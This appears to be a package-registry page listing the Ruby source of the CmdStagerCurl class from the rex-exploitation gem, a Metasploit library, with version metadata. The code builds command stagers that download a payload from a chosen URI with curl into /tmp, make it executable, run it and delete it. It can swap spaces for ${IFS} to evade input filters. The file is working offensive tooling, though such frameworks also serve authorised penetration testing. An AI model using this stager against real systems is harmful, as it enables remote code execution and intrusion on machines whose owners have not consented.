Sha256: 9c00780f772e46537978fc56a16de17debccec9f6c1ac9f4964be900348df397

Contents?: true

Size: 1.18 KB

Versions: 3

Compression:

Stored size: 1.18 KB

Contents

# -*- coding: binary -*-

class Rex::Exploitation::CmdStagerCurl < Rex::Exploitation::CmdStagerBase

  def http?
    true
  end

  def user_agent
    /^curl/
  end

  def generate(opts = {})
    if opts[:payload_uri].nil?
      raise "#{self.class.name}##{__callee__} missing opts[:payload_uri]"
    end

    opts[:temp] ||= '/tmp'
    opts[:file] ||= Rex::Text.rand_text_alpha(8)
    opts[:silent] = true if opts[:silent].nil?
    @payload_path = "#{opts[:temp]}/#{opts[:file]}"

    super
  end

  def generate_cmds_payload(opts)
    cmds = []
    uri = opts[:payload_uri]
    silent_flag = opts[:silent] ? 's' : ''

    if opts[:ssl]
      cmds << "curl -#{silent_flag}ko #{@payload_path} #{uri}"
    else
      uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
      cmds << "curl -#{silent_flag}o #{@payload_path} #{uri}"
    end

    cmds
  end

  def generate_cmds_decoder(opts)
    cmds = []

    cmds << "chmod +x #{@payload_path}"
    cmds << @payload_path
    cmds << "rm -f #{@payload_path}" unless opts[:nodelete]

    cmds
  end

  def compress_commands(cmds, opts)
    cmds.each { |cmd| cmd.gsub!(/\s+/, '${IFS}') } if opts[:nospace]
    super
  end

  def cmd_concat_operator
    ';'
  end

end

Version data entries

3 entries across 3 versions & 1 rubygems

Version Path
rex-exploitation-0.1.40 lib/rex/exploitation/cmdstager/curl.rb
rex-exploitation-0.1.39 lib/rex/exploitation/cmdstager/curl.rb
rex-exploitation-0.1.38 lib/rex/exploitation/cmdstager/curl.rb